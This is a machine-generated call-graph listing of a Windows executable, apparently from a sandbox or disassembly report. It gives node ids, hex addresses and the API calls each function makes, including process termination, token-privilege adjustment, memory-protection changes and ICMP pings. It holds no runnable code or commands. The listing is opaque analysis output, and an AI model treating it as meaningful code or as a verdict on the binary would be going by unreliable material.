169017 104320->104327 104425 15f636 20 API calls __dosmaperr 104322->104425 104324 168fcb 104419 15f649 20 API calls __dosmaperr 104324->104419 104325 1690a9 104426 15f649 20 API calls __dosmaperr 104325->104426 104329 169026 104327->104329 104330 16903b 104327->104330 104420 15f636 20 API calls __dosmaperr 104329->104420 104352 1654ba EnterCriticalSection 104330->104352 104332 169033 104427 162b5c 26 API calls __fread_nolock 104332->104427 104334 16902b 104421 15f649 20 API calls __dosmaperr 104334->104421 104335 169041 104337 169072 104335->104337 104338 16905d 104335->104338 104353 1690c5 104337->104353 104422 15f649 20 API calls __dosmaperr 104338->104422 104340 168fd3 __fread_nolock 104340->104301 104343 169062 104423 15f636 20 API calls __dosmaperr 104343->104423 104344 16906d 104424 16909c LeaveCriticalSection __wsopen_s 104344->104424 104347->104293 104348->104304 104349->104296 104350->104314 104351->104316 104352->104335 104354 1690d7 104353->104354 104355 1690ef 104353->104355 104444 15f636 20 API calls __dosmaperr 104354->104444 104356 169459 104355->104356 104360 169134 104355->104360 104461 15f636 20 API calls __dosmaperr 104356->104461 104358 1690dc 104445 15f649 20 API calls __dosmaperr 104358->104445 104363 16913f 104360->104363 104364 1690e4 104360->104364 104371 16916f 104360->104371 104362 16945e 104462 15f649 20 API calls __dosmaperr 104362->104462 104446 15f636 20 API calls __dosmaperr 104363->104446 104364->104344 104366 16914c 104463 162b5c 26 API calls __fread_nolock 104366->104463 104368 169144 104447 15f649 20 API calls __dosmaperr 104368->104447 104372 169188 104371->104372 104373 1691ae 104371->104373 104374 1691ca 104371->104374 104372->104373 104407 169195 104372->104407 104448 15f636 20 API calls __dosmaperr 104373->104448 104428 163b93 104374->104428 104376 1691b3 104449 15f649 20 API calls __dosmaperr 104376->104449 104381 1691ba 104450 162b5c 26 API calls __fread_nolock 104381->104450 104382 169333 104385 1693a9 104382->104385 104388 16934c GetConsoleMode 104382->104388 104383 162d38 _free 20 API calls 104386 1691ea 104383->104386 104387 1693ad ReadFile 104385->104387 104389 162d38 _free 20 API calls 104386->104389 104390 1693c7 104387->104390 104391 169421 GetLastError 104387->104391 104388->104385 104392 16935d 104388->104392 104393 1691f1 104389->104393 104390->104391 104398 16939e 104390->104398 104396 169385 104391->104396 104397 16942e 104391->104397 104392->104387 104399 169363 ReadConsoleW 104392->104399 104394 169216 104393->104394 104395 1691fb 104393->104395 104453 1697a4 104394->104453 104451 15f649 20 API calls __dosmaperr 104395->104451 104416 1691c5 __fread_nolock 104396->104416 104456 15f613 20 API calls __dosmaperr 104396->104456 104459 15f649 20 API calls __dosmaperr 104397->104459 104411 169403 104398->104411 104412 1693ec 104398->104412 104398->104416 104399->104398 104403 16937f GetLastError 104399->104403 104403->104396 104404 162d38 _free 20 API calls 104404->104364 104405 169200 104452 15f636 20 API calls __dosmaperr 104405->104452 104406 169433 104460 15f636 20 API calls __dosmaperr 104406->104460 104435 16fc1b 104407->104435 104414 16941a 104411->104414 104411->104416 104457 168de1 31 API calls 3 library calls 104412->104457 104458 168c21 29 API calls __wsopen_s 104414->104458 104416->104404 104417 16941f 104417->104416 104418->104324 104419->104340 104420->104334 104421->104332 104422->104343 104423->104344 104424->104340 104425->104325 104426->104332 104427->104340 104429 163bd1 104428->104429 104430 163ba1 __dosmaperr 104428->104430 104465 15f649 20 API calls __dosmaperr 104429->104465 104430->104429 104432 163bbc RtlAllocateHeap 104430->104432 104464 15521d 7 API calls 2 library calls 104430->104464 104432->104430 104433 163bcf 104432->104433 104433->104383 104436 16fc35 104435->104436 104437 16fc28 104435->104437 104439 16fc41 104436->104439 104467 15f649 20 API calls __dosmaperr 104436->104467 104466 15f649 20 API calls __dosmaperr 104437->104466 104439->104382 104441 16fc2d 104441->104382 104442 16fc62 104468 162b5c 26 API calls __fread_nolock 104442->104468 104444->104358 104445->104364 104446->104368 104447->104366 104448->104376 104449->104381 104450->104416 104451->104405 104452->104416 104469 16970b 104453->104469 104456->104416 104457->104416 104458->104417 104459->104406 104460->104416 104461->104362 104462->104366 104463->104364 104464->104430 104465->104433 104466->104441 104467->104442 104468->104441 104470 165737 __wsopen_s 26 API calls 104469->104470 104471 16971d 104470->104471 104472 169736 SetFilePointerEx 104471->104472 104473 169725 104471->104473 104475 16974e GetLastError 104472->104475 104477 16972a 104472->104477 104478 15f649 20 API calls __dosmaperr 104473->104478 104479 15f613 20 API calls __dosmaperr 104475->104479 104477->104407 104478->104477 104479->104477 102699 186555 102700 15014b 8 API calls 102699->102700 102701 18655c 102700->102701 102702 15017b 8 API calls 102701->102702 102704 186575 __fread_nolock 102701->102704 102702->102704 102703 15017b 8 API calls 102705 18659a 102703->102705 102704->102703 104480 13dd3d 104481 13dd63 104480->104481 104482 1819c2 104480->104482 104483 13dead 104481->104483 104486 15014b 8 API calls 104481->104486 104485 181a82 104482->104485 104490 181a26 104482->104490 104493 181a46 104482->104493 104487 15017b 8 API calls 104483->104487 104540 1a3fe1 81 API calls __wsopen_s 104485->104540 104492 13dd8d 104486->104492 104499 13dee4 __fread_nolock 104487->104499 104488 181a7d 104538 14e6e8 224 API calls 104490->104538 104494 15014b 8 API calls 104492->104494 104492->104499 104493->104488 104539 1a3fe1 81 API calls __wsopen_s 104493->104539 104496 13dddb 104494->104496 104495 15017b 8 API calls 104495->104499 104496->104490 104497 13de16 104496->104497 104498 140340 224 API calls 104497->104498 104500 13de29 104498->104500 104499->104493 104499->104495 104500->104488 104500->104499 104501 181aa5 104500->104501 104502 13de77 104500->104502 104504 13d526 104500->104504 104541 1a3fe1 81 API calls __wsopen_s 104501->104541 104502->104483 104502->104504 104505 15014b 8 API calls 104504->104505 104506 13d589 104505->104506 104522 13c32d 104506->104522 104509 15014b 8 API calls 104511 13d66e messages 104509->104511 104516 181f79 104511->104516 104518 13bed9 8 API calls 104511->104518 104519 181f94 104511->104519 104520 13c3ab 8 API calls 104511->104520 104521 13d911 messages 104511->104521 104542 13b4c8 8 API calls 104511->104542 104513 13d9ac messages 104515 13d9c3 104513->104515 104537 14e30a 8 API calls messages 104513->104537 104543 1956ae 8 API calls messages 104516->104543 104518->104511 104520->104511 104521->104513 104529 13c3ab 104521->104529 104525 13c33d 104522->104525 104523 13c345 104523->104509 104524 15014b 8 API calls 104524->104525 104525->104523 104525->104524 104526 13bf73 8 API calls 104525->104526 104527 13bed9 8 API calls 104525->104527 104528 13c32d 8 API calls 104525->104528 104526->104525 104527->104525 104528->104525 104530 13c3b9 104529->104530 104536 13c3e1 messages 104529->104536 104531 13c3c7 104530->104531 104532 13c3ab 8 API calls 104530->104532 104533 13c3cd 104531->104533 104534 13c3ab 8 API calls 104531->104534 104532->104531 104533->104536 104544 13c7e0 8 API calls messages 104533->104544 104534->104533 104536->104513 104537->104513 104538->104493 104539->104488 104540->104488 104541->104488 104542->104511 104543->104519 104544->104536 102706 13f4dc 102709 13cab0 102706->102709 102708 13f4ea 102710 13cacb 102709->102710 102711 18150c 102710->102711 102712 1814be 102710->102712 102719 13caf0 102710->102719 102782 1b62ff 224 API calls 2 library calls 102711->102782 102715 1814c8 102712->102715 102718 1814d5 102712->102718 102712->102719 102780 1b6790 224 API calls 102715->102780 102737 13cdc0 102718->102737 102781 1b6c2d 224 API calls 2 library calls 102718->102781 102724 13cf80 39 API calls 102719->102724 102727 13cdee 102719->102727 102728 1816e8 102719->102728 102732 13cf70 102719->102732 102736 14e807 39 API calls 102719->102736 102719->102737 102739 13bed9 8 API calls 102719->102739 102741 140340 102719->102741 102764 13be2d 102719->102764 102768 14e7c1 39 API calls 102719->102768 102769 14aa99 224 API calls 102719->102769 102770 1505b2 5 API calls __Init_thread_wait 102719->102770 102771 14bc58 102719->102771 102776 150413 29 API calls __onexit 102719->102776 102777 150568 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 102719->102777 102778 14f4df 81 API calls 102719->102778 102779 14f346 224 API calls 102719->102779 102783 13b4c8 8 API calls 102719->102783 102784 18ffaf 8 API calls 102719->102784 102722 18179f 102722->102722 102724->102719 102727->102708 102785 1b6669 81 API calls 102728->102785 102732->102708 102736->102719 102737->102732 102786 1a3fe1 81 API calls __wsopen_s 102737->102786 102739->102719 102743 140376 messages 102741->102743 102742 15014b 8 API calls 102742->102743 102743->102742 102744 141695 102743->102744 102745 18632b 102743->102745 102748 185cdb 102743->102748 102749 18625a 102743->102749 102755 13bed9 8 API calls 102743->102755 102756 1505b2 EnterCriticalSection LeaveCriticalSection LeaveCriticalSection WaitForSingleObjectEx EnterCriticalSection 102743->102756 102757 14049d messages 102743->102757 102758 13bf73 8 API calls 102743->102758 102759 150413 29 API calls pre_c_initialization 102743->102759 102760 186115 102743->102760 102761 140aae messages 102743->102761 102763 150568 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent __Init_thread_footer 102743->102763 102787 141990 102743->102787 102849 141e50 102743->102849 102750 13bed9 8 API calls 102744->102750 102744->102757 102862 1a3fe1 81 API calls __wsopen_s 102745->102862 102754 13bed9 8 API calls 102748->102754 102748->102757 102861 1a3fe1 81 API calls __wsopen_s 102749->102861 102750->102757 102754->102757 102755->102743 102756->102743 102757->102719 102758->102743 102759->102743 102859 1a3fe1 81 API calls __wsopen_s 102760->102859 102860 1a3fe1 81 API calls __wsopen_s 102761->102860 102763->102743 102765 13be38 102764->102765 102766 13be67 102765->102766 103676 13bfa5 102765->103676 102766->102719 102768->102719 102769->102719 102770->102719 102772 15014b 8 API calls 102771->102772 102773 14bc65 102772->102773 102774 13b329 8 API calls 102773->102774 102775 14bc70 102774->102775 102775->102719 102776->102719 102777->102719 102778->102719 102779->102719 102780->102718 102781->102737 102782->102719 102783->102719 102784->102719 102785->102737 102786->102722 102788 1419b6 102787->102788 102789 141a2e 102787->102789 102790 186b60 102788->102790 102791 1419c3 102788->102791 102792 186a4d 102789->102792 102805 141a3d 102789->102805 102869 1b85db 224 API calls 2 library calls 102790->102869 102800 186b84 102791->102800 102801 1419cd 102791->102801 102794 186a58 102792->102794 102795 186b54 102792->102795 102867 14b35c 224 API calls 102794->102867 102868 1a3fe1 81 API calls __wsopen_s 102795->102868 102798 186bb5 102802 186bc0 102798->102802 102803 186be2 102798->102803 102799 140340 224 API calls 102799->102805 102800->102798 102810 186b9c 102800->102810 102809 13bed9 8 API calls 102801->102809 102813 1419e0 messages 102801->102813 102871 1b85db 224 API calls 2 library calls 102802->102871 102872 1b60e6 102803->102872 102804 186979 102866 1a3fe1 81 API calls __wsopen_s 102804->102866 102805->102799 102805->102804 102808 141bb5 102805->102808 102811 186908 102805->102811 102805->102813 102825 141ba9 102805->102825 102830 141af4 102805->102830 102808->102743 102809->102813 102870 1a3fe1 81 API calls __wsopen_s 102810->102870 102865 1a3fe1 81 API calls __wsopen_s 102811->102865 102812 186dd9 102820 186e0f 102812->102820 102952 1b81ce 65 API calls 102812->102952 102813->102812 102846 141a23 messages 102813->102846 102950 1b808f 53 API calls __wsopen_s 102813->102950 102816 141b62 messages 102816->102813 102824 13bed9 8 API calls 102816->102824 102816->102846 102954 13b4c8 8 API calls 102820->102954 102821 186db7 102826 138ec0 52 API calls 102821->102826 102824->102813 102825->102808 102864 1a3fe1 81 API calls __wsopen_s 102825->102864 102841 186dbf _wcslen 102826->102841 102827 186c08 102879 1a148b 102827->102879 102828 186ded 102832 138ec0 52 API calls 102828->102832 102829 186c81 102948 1a1ad8 8 API calls 102829->102948 102830->102825 102863 141ca0 8 API calls 102830->102863 102845 186df5 _wcslen 102832->102845 102835 18691d messages 102835->102804 102835->102816 102835->102846 102836 186c93 102949 13bd07 8 API calls 102836->102949 102838 141b55 102838->102816 102838->102825 102840 186c9c 102848 1a148b 8 API calls 102840->102848 102841->102812 102951 13b4c8 8 API calls 102841->102951 102845->102820 102953 13b4c8 8 API calls 102845->102953 102846->102743 102848->102813 102852 141e6d messages 102849->102852 102850 142512 102854 141ff7 messages 102850->102854 103675 14be08 39 API calls 102850->103675 102852->102850 102852->102854 102855 187837 102852->102855 102858 18766b 102852->102858 103673 14e322 8 API calls messages 102852->103673 102854->102743 102855->102854 103674 15d2d5 39 API calls 102855->103674 103672 15d2d5 39 API calls 102858->103672 102859->102761 102860->102757 102861->102757 102862->102757 102863->102838 102864->102846 102865->102835 102866->102813 102867->102816 102868->102790 102869->102813 102870->102846 102871->102813 102873 1b6101 102872->102873 102878 186bed 102872->102878 102874 15017b 8 API calls 102873->102874 102876 1b6123 102874->102876 102875 15014b 8 API calls 102875->102876 102876->102875 102876->102878 102955 1a1400 8 API calls 102876->102955 102878->102827 102878->102829 102880 1a1499 102879->102880 102881 186c32 102879->102881 102880->102881 102882 15014b 8 API calls 102880->102882 102883 142b20 102881->102883 102882->102881 102884 142b61 102883->102884 102885 142b86 102884->102885 102886 142fc0 102884->102886 102887 187bd8 102885->102887 102888 142ba0 102885->102888 103200 1505b2 5 API calls __Init_thread_wait 102886->103200 103163 1b7af9 102887->103163 102956 143160 102888->102956 102891 142fca 102895 13b329 8 API calls 102891->102895 102901 14300b 102891->102901 102894 187be4 102894->102813 102904 142fe4 102895->102904 102896 143160 9 API calls 102897 142bc6 102896->102897 102898 142bfc 102897->102898 102897->102901 102900 187bfd 102898->102900 102924 142c18 __fread_nolock 102898->102924 102899 187bed 102899->102813 103205 1a3fe1 81 API calls __wsopen_s 102900->103205 102901->102899 103202 13b4c8 8 API calls 102901->103202 103201 150568 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 102904->103201 102905 143049 103203 14e6e8 224 API calls 102905->103203 102907 187c15 103206 1a3fe1 81 API calls __wsopen_s 102907->103206 102910 142d3f 102911 187c78 102910->102911 102912 142d4c 102910->102912 103208 1b61a2 53 API calls _wcslen 102911->103208 102913 143160 9 API calls 102912->102913 102915 142d59 102913->102915 102918 187da1 102915->102918 102920 143160 9 API calls 102915->102920 102916 15014b 8 API calls 102916->102924 102917 15017b 8 API calls 102917->102924 102929 187c10 102918->102929 103209 1a3fe1 81 API calls __wsopen_s 102918->103209 102919 143082 103204 14fe39 8 API calls 102919->103204 102925 142d73 102920->102925 102923 140340 224 API calls 102923->102924 102924->102905 102924->102907 102924->102910 102924->102916 102924->102917 102924->102923 102926 187c59 102924->102926 102924->102929 102925->102918 102928 13bed9 8 API calls 102925->102928 102931 142dd7 messages 102925->102931 103207 1a3fe1 81 API calls __wsopen_s 102926->103207 102928->102931 102929->102813 102930 143160 9 API calls 102930->102931 102931->102918 102931->102919 102931->102929 102931->102930 102934 142e8b messages 102931->102934 102966 138bda 102931->102966 103041 1b9ffc 102931->103041 103044 14ac3e 102931->103044 103063 1ba5b2 102931->103063 103069 1ba6aa 102931->103069 103077 1af94a 102931->103077 103086 1a664c 102931->103086 103093 1b9fe8 102931->103093 103096 1bad47 102931->103096 103101 1ba9ac 102931->103101 103109 1b0fb8 102931->103109 103134 14f950 102931->103134 103141 1bab3f 102931->103141 102932 142f2d 102932->102813 102934->102932 103199 14e322 8 API calls messages 102934->103199 102948->102836 102949->102840 102950->102821 102951->102812 102952->102828 102953->102820 102954->102846 102955->102876 102957 1431a1 102956->102957 102958 14317d 102956->102958 103210 1505b2 5 API calls __Init_thread_wait 102957->103210 102965 142bb0 102958->102965 103212 1505b2 5 API calls __Init_thread_wait 102958->103212 102961 1431ab 102961->102958 103211 150568 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 102961->103211 102962 149f47 102962->102965 103213 150568 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 102962->103213 102965->102896 102967 138ec0 52 API calls 102966->102967 102968 138bf9 102967->102968 102969 138ec0 52 API calls 102968->102969 102970 138c0e 102969->102970 102971 138ec0 52 API calls 102970->102971 102972 138c21 102971->102972 102973 138ec0 52 API calls 102972->102973 102974 138c37 102973->102974 103214 137ad5 102974->103214 102977 176767 102980 137e12 8 API calls 102977->102980 102979 138c72 102979->102977 103009 138c98 try_get_first_available_module 102979->103009 102981 176786 102980->102981 102982 138470 8 API calls 102981->102982 102983 176798 102982->102983 102986 138a60 8 API calls 102983->102986 103014 1767bd 102983->103014 102985 138ec0 52 API calls 102989 138d27 102985->102989 102986->103014 102988 138d3c 103238 137e12 102988->103238 102995 138ec0 52 API calls 102989->102995 102990 176873 102993 17687d 102990->102993 102994 1768bc 102990->102994 102991 138d5c 102996 138d71 102991->102996 102997 17696e 102991->102997 102999 138470 8 API calls 102993->102999 103000 138470 8 API calls 102994->103000 102995->102988 103244 138470 102996->103244 102998 138470 8 API calls 102997->102998 103003 17697b 102998->103003 103004 176885 102999->103004 103005 1768c5 103000->103005 103002 13893c 8 API calls 103002->103014 103010 138a60 8 API calls 103003->103010 103011 138ec0 52 API calls 103004->103011 103012 138a60 8 API calls 103005->103012 103007 13bd57 8 API calls 103036 138d91 try_get_first_available_module 103007->103036 103008 138a60 8 API calls 103008->103014 103009->102985 103009->102988 103009->103036 103010->103036 103015 176897 103011->103015 103013 1768e1 103012->103013 103019 138ec0 52 API calls 103013->103019 103014->103002 103014->103008 103039 138e71 103014->103039 103250 138844 8 API calls __fread_nolock 103014->103250 103251 138844 8 API calls __fread_nolock 103015->103251 103017 1768ab 103020 13893c 8 API calls 103017->103020 103021 1768fc 103019->103021 103022 1768b9 103020->103022 103252 138844 8 API calls __fread_nolock 103021->103252 103030 138a60 8 API calls 103022->103030 103023 13893c 8 API calls 103023->103036 103025 1769f1 103224 13893c 103025->103224 103026 1769c1 103026->103025 103031 1769e5 103026->103031 103027 138a60 8 API calls 103027->103036 103029 176910 103034 13893c 8 API calls 103029->103034 103030->103039 103253 13ad40 8 API calls __fread_nolock 103031->103253 103034->103022 103035 1769ef 103036->103023 103036->103026 103036->103027 103036->103039 103249 138844 8 API calls __fread_nolock 103036->103249 103038 176a12 103040 13bd57 8 API calls 103038->103040 103039->102931 103040->103035 103269 1b89b6 103041->103269 103043 1ba00c 103043->102931 103045 138ec0 52 API calls 103044->103045 103046 14ac68 103045->103046 103047 14bc58 8 API calls 103046->103047 103048 14ac7f 103047->103048 103049 13c98d 39 API calls 103048->103049 103051 14b09b _wcslen 103048->103051 103049->103051 103050 14bbbe 43 API calls 103050->103051 103051->103050 103053 137ad5 8 API calls 103051->103053 103056 136c03 8 API calls 103051->103056 103057 13c98d 39 API calls 103051->103057 103058 14b1fb 103051->103058 103059 138ec0 52 API calls 103051->103059 103060 138577 8 API calls 103051->103060 103372 13396b 103051->103372 103382 133907 103051->103382 103386 154d98 103051->103386 103396 13ad40 8 API calls __fread_nolock 103051->103396 103397 137b1a 8 API calls 103051->103397 103053->103051 103056->103051 103057->103051 103058->102931 103059->103051 103060->103051 103065 1ba5c5 103063->103065 103064 138ec0 52 API calls 103066 1ba632 103064->103066 103065->103064 103068 1ba5d4 103065->103068 103458 1a18a9 103066->103458 103068->102931 103070 1ba705 103069->103070 103076 1ba6c5 103069->103076 103071 1ba723 103070->103071 103072 13c98d 39 API calls 103070->103072 103073 13c98d 39 API calls 103071->103073 103074 1ba780 103071->103074 103071->103076 103072->103071 103073->103074 103502 1a0372 103074->103502 103076->102931 103078 15017b 8 API calls 103077->103078 103079 1af95b 103078->103079 103080 13423c 8 API calls 103079->103080 103081 1af965 103080->103081 103082 138ec0 52 API calls 103081->103082 103083 1af97c GetEnvironmentVariableW 103082->103083 103560 1a160f 8 API calls 103083->103560 103085 1af999 messages 103085->102931 103087 138ec0 52 API calls 103086->103087 103088 1a6662 103087->103088 103561 19dc54 103088->103561 103090 1a666a 103091 1a666e GetLastError 103090->103091 103092 1a6683 103090->103092 103091->103092 103092->102931 103094 1b89b6 119 API calls 103093->103094 103095 1b9ff8 103094->103095 103095->102931 103097 138ec0 52 API calls 103096->103097 103098 1bad63 103097->103098 103630 19dd87 CreateToolhelp32Snapshot Process32FirstW 103098->103630 103100 1bad72 103100->102931 103103 1baa08 103101->103103 103108 1ba9c8 103101->103108 103102 1baa26 103104 13c98d 39 API calls 103102->103104 103106 1baa8e 103102->103106 103102->103108 103103->103102 103105 13c98d 39 API calls 103103->103105 103104->103106 103105->103102 103107 1a0372 58 API calls 103106->103107 103107->103108 103108->102931 103110 1b0fe1 103109->103110 103111 1b100f WSAStartup 103110->103111 103112 13c98d 39 API calls 103110->103112 103113 1b1054 103111->103113 103133 1b1023 messages 103111->103133 103115 1b0ffc 103112->103115 103649 14c1f6 103113->103649 103115->103111 103117 13c98d 39 API calls 103115->103117 103119 1b100b 103117->103119 103118 138ec0 52 API calls 103120 1b1069 103118->103120 103119->103111 103654 14f9d4 WideCharToMultiByte 103120->103654 103122 1b1075 inet_addr gethostbyname 103123 1b1093 IcmpCreateFile 103122->103123 103122->103133 103124 1b10d3 103123->103124 103123->103133 103125 15017b 8 API calls 103124->103125 103126 1b10ec 103125->103126 103127 13423c 8 API calls 103126->103127 103128 1b10f7 103127->103128 103129 1b112b IcmpSendEcho 103128->103129 103130 1b1102 IcmpSendEcho 103128->103130 103132 1b114c 103129->103132 103130->103132 103131 1b1212 IcmpCloseHandle WSACleanup 103131->103133 103132->103131 103133->102931 103135 13c98d 39 API calls 103134->103135 103136 14f964 103135->103136 103137 18fb20 Sleep 103136->103137 103138 14f96c timeGetTime 103136->103138 103139 13c98d 39 API calls 103138->103139 103140 14f982 103139->103140 103140->102931 103142 138ec0 52 API calls 103141->103142 103143 1bab62 103142->103143 103144 19dd87 46 API calls 103143->103144 103145 1bab73 103144->103145 103146 1babc3 OpenProcess 103145->103146 103153 1bab78 103145->103153 103147 1babdd GetLastError 103146->103147 103148 1bacc2 TerminateProcess 103146->103148 103151 1babec 103147->103151 103159 1bac72 103147->103159 103149 1baccf GetLastError 103148->103149 103150 1bad20 CloseHandle 103148->103150 103156 1bace3 103149->103156 103150->103153 103664 19d715 12 API calls 103151->103664 103153->102931 103154 1babfa 103665 192010 11 API calls messages 103154->103665 103156->103150 103157 1bac04 103158 1bac08 OpenProcess 103157->103158 103160 1bac1a 103157->103160 103158->103160 103159->103148 103159->103153 103666 191a0b AdjustTokenPrivileges CloseHandle messages 103160->103666 103162 1bac70 103162->103159 103164 1b7b38 103163->103164 103165 1b7b52 103163->103165 103667 1a3fe1 81 API calls __wsopen_s 103164->103667 103167 1b60e6 8 API calls 103165->103167 103168 1b7b5d 103167->103168 103169 140340 223 API calls 103168->103169 103170 1b7bc1 103169->103170 103171 1b7b4a 103170->103171 103172 1b7c5c 103170->103172 103173 1b7c03 103170->103173 103171->102894 103174 1b7cb0 103172->103174 103176 1b7c62 103172->103176 103179 1a148b 8 API calls 103173->103179 103174->103171 103175 138ec0 52 API calls 103174->103175 103177 1b7cc2 103175->103177 103668 1a1ad8 8 API calls 103176->103668 103180 13c2c9 8 API calls 103177->103180 103183 1b7c3b 103179->103183 103184 1b7ce6 CharUpperBuffW 103180->103184 103181 1b7c85 103669 13bd07 8 API calls 103181->103669 103185 142b20 223 API calls 103183->103185 103186 1b7d00 103184->103186 103185->103171 103187 1b7d53 103186->103187 103188 1b7d07 103186->103188 103189 138ec0 52 API calls 103187->103189 103191 1a148b 8 API calls 103188->103191 103190 1b7d5b 103189->103190 103670 14aa65 9 API calls 103190->103670 103193 1b7d35 103191->103193 103194 142b20 223 API calls 103193->103194 103194->103171 103195 1b7d65 103195->103171 103196 138ec0 52 API calls 103195->103196 103197 1b7d80 103196->103197 103671 13bd07 8 API calls 103197->103671 103199->102934 103200->102891 103201->102901 103202->102905 103203->102919 103204->102919 103205->102929 103206->102929 103207->102929 103208->102925 103209->102929 103210->102961 103211->102958 103212->102962 103213->102965 103215 15017b 8 API calls 103214->103215 103216 137afa 103215->103216 103217 15014b 8 API calls 103216->103217 103218 137b08 103217->103218 103218->102977 103219 13c98d 103218->103219 103220 13c99e 103219->103220 103221 13c9a5 103219->103221 103220->103221 103254 156641 39 API calls _strftime 103220->103254 103221->102979 103223 13c9e8 103223->102979 103225 15014b 8 API calls 103224->103225 103226 13894a 103225->103226 103227 138a60 103226->103227 103228 138a76 103227->103228 103229 176737 103228->103229 103235 138a80 103228->103235 103255 14b7a2 8 API calls 103229->103255 103231 176744 103256 13b4c8 8 API calls 103231->103256 103233 176762 103233->103233 103234 138b94 103236 15014b 8 API calls 103234->103236 103235->103231 103235->103234 103237 138b9b 103235->103237 103236->103237 103237->103038 103239 137e1a 103238->103239 103240 15014b 8 API calls 103239->103240 103241 137e28 103240->103241 103257 138445 103241->103257 103260 13c760 103244->103260 103246 138480 103247 15017b 8 API calls 103246->103247 103248 13851c 103246->103248 103247->103248 103248->103007 103249->103036 103250->103014 103251->103017 103252->103029 103253->103035 103254->103223 103255->103231 103256->103233 103258 15014b 8 API calls 103257->103258 103259 137e30 103258->103259 103259->102990 103259->102991 103261 13c76b 103260->103261 103262 181285 103261->103262 103267 13c773 messages 103261->103267 103263 15014b 8 API calls 103262->103263 103265 181291 103263->103265 103264 13c77a 103264->103246 103267->103264 103268 13c7e0 8 API calls messages 103267->103268 103268->103267 103270 138ec0 52 API calls 103269->103270 103271 1b89ed 103270->103271 103293 1b8a32 messages 103271->103293 103307 1b9730 103271->103307 103273 1b8cde 103274 1b8eac 103273->103274 103278 1b8cec 103273->103278 103346 1b9941 59 API calls 103274->103346 103277 1b8ebb 103277->103278 103279 1b8ec7 103277->103279 103320 1b88e3 103278->103320 103279->103293 103280 138ec0 52 API calls 103298 1b8aa6 103280->103298 103285 1b8d25 103334 14ffe0 103285->103334 103288 1b8d5f 103290 137e12 8 API calls 103288->103290 103289 1b8d45 103341 1a3fe1 81 API calls __wsopen_s 103289->103341 103294 1b8d6e 103290->103294 103292 1b8d50 GetCurrentProcess TerminateProcess 103292->103288 103293->103043 103295 138470 8 API calls 103294->103295 103296 1b8d87 103295->103296 103304 1b8daf 103296->103304 103342 141ca0 8 API calls 103296->103342 103298->103273 103298->103280 103298->103293 103339 194ad3 8 API calls __fread_nolock 103298->103339 103340 1b8f7a 41 API calls _strftime 103298->103340 103299 1b8f22 103299->103293 103301 1b8f36 FreeLibrary 103299->103301 103300 1b8d9e 103343 1b95d8 74 API calls 103300->103343 103301->103293 103304->103299 103344 141ca0 8 API calls 103304->103344 103345 13b4c8 8 API calls 103304->103345 103347 1b95d8 74 API calls 103304->103347 103308 13c2c9 8 API calls 103307->103308 103309 1b974b CharLowerBuffW 103308->103309 103348 199805 103309->103348 103313 13bf73 8 API calls 103314 1b9787 103313->103314 103355 13acc0 103314->103355 103316 1b979b 103317 13adf4 8 API calls 103316->103317 103319 1b97a5 _wcslen 103317->103319 103318 1b98bb _wcslen 103318->103298 103319->103318 103367 1b8f7a 41 API calls _strftime 103319->103367 103321 1b88fe 103320->103321 103322 1b8949 103320->103322 103323 15017b 8 API calls 103321->103323 103326 1b9af3 103322->103326 103324 1b8920 103323->103324 103324->103322 103325 15014b 8 API calls 103324->103325 103325->103324 103327 1b9d08 messages 103326->103327 103332 1b9b17 _strcat _wcslen ___std_exception_copy 103326->103332 103327->103285 103328 13c63f 39 API calls 103328->103332 103329 13c98d 39 API calls 103329->103332 103330 13ca5b 39 API calls 103330->103332 103331 138ec0 52 API calls 103331->103332 103332->103327 103332->103328 103332->103329 103332->103330 103332->103331 103371 19f8c5 10 API calls _wcslen 103332->103371 103335 14fff5 103334->103335 103336 15008d NtProtectVirtualMemory 103335->103336 103337 15005b 103335->103337 103338 15007b CloseHandle 103335->103338 103336->103337 103337->103288 103337->103289 103338->103337 103339->103298 103340->103298 103341->103292 103342->103300 103343->103304 103344->103304 103345->103304 103346->103277 103347->103304 103349 199825 _wcslen 103348->103349 103351 19985a 103349->103351 103353 199919 103349->103353 103354 199914 103349->103354 103351->103354 103368 14e36b 41 API calls 103351->103368 103353->103354 103369 14e36b 41 API calls 103353->103369 103354->103313 103354->103319 103356 13ace1 103355->103356 103366 13accf 103355->103366 103360 13ad07 103356->103360 103361 180557 103356->103361 103356->103366 103357 13acda __fread_nolock 103357->103316 103358 13c2c9 8 API calls 103359 1805a3 __fread_nolock 103358->103359 103370 1388e8 8 API calls 103360->103370 103362 15014b 8 API calls 103361->103362 103364 180561 103362->103364 103365 15017b 8 API calls 103364->103365 103365->103366 103366->103357 103366->103358 103367->103318 103368->103351 103369->103353 103370->103357 103371->103332 103373 133996 ___scrt_fastfail 103372->103373 103398 135f32 103373->103398 103377 133a3a Shell_NotifyIconW 103402 1361a9 103377->103402 103378 1740cd Shell_NotifyIconW 103380 133a50 103380->103051 103381 133a1c 103381->103377 103381->103378 103383 133969 103382->103383 103384 133919 ___scrt_fastfail 103382->103384 103383->103051 103385 133938 Shell_NotifyIconW 103384->103385 103385->103383 103387 154e1b 103386->103387 103388 154da6 103386->103388 103457 154e2d 40 API calls 4 library calls 103387->103457 103394 154dcb 103388->103394 103455 15f649 20 API calls __dosmaperr 103388->103455 103391 154e28 103391->103051 103392 154db2 103456 162b5c 26 API calls __fread_nolock 103392->103456 103394->103051 103395 154dbd 103395->103051 103396->103051 103397->103051 103399 1339eb 103398->103399 103400 135f4e 103398->103400 103399->103381 103432 19d11f 42 API calls _strftime 103399->103432 103400->103399 103401 175070 DestroyIcon 103400->103401 103401->103399 103403 1361c6 103402->103403 103421 1362a8 103402->103421 103404 137ad5 8 API calls 103403->103404 103405 1361d4 103404->103405 103406 1361e1 103405->103406 103407 175278 LoadStringW 103405->103407 103408 138577 8 API calls 103406->103408 103410 175292 103407->103410 103409 1361f6 103408->103409 103411 136203 103409->103411 103418 1752ae 103409->103418 103413 13bed9 8 API calls 103410->103413 103417 136229 ___scrt_fastfail 103410->103417 103411->103410 103412 13620d 103411->103412 103414 136b7c 8 API calls 103412->103414 103413->103417 103415 13621b 103414->103415 103433 137bb5 103415->103433 103419 13628e Shell_NotifyIconW 103417->103419 103418->103417 103420 13bf73 8 API calls 103418->103420 103430 1752f1 103418->103430 103419->103421 103422 1752d8 103420->103422 103421->103380 103442 19a350 9 API calls 103422->103442 103425 175310 103427 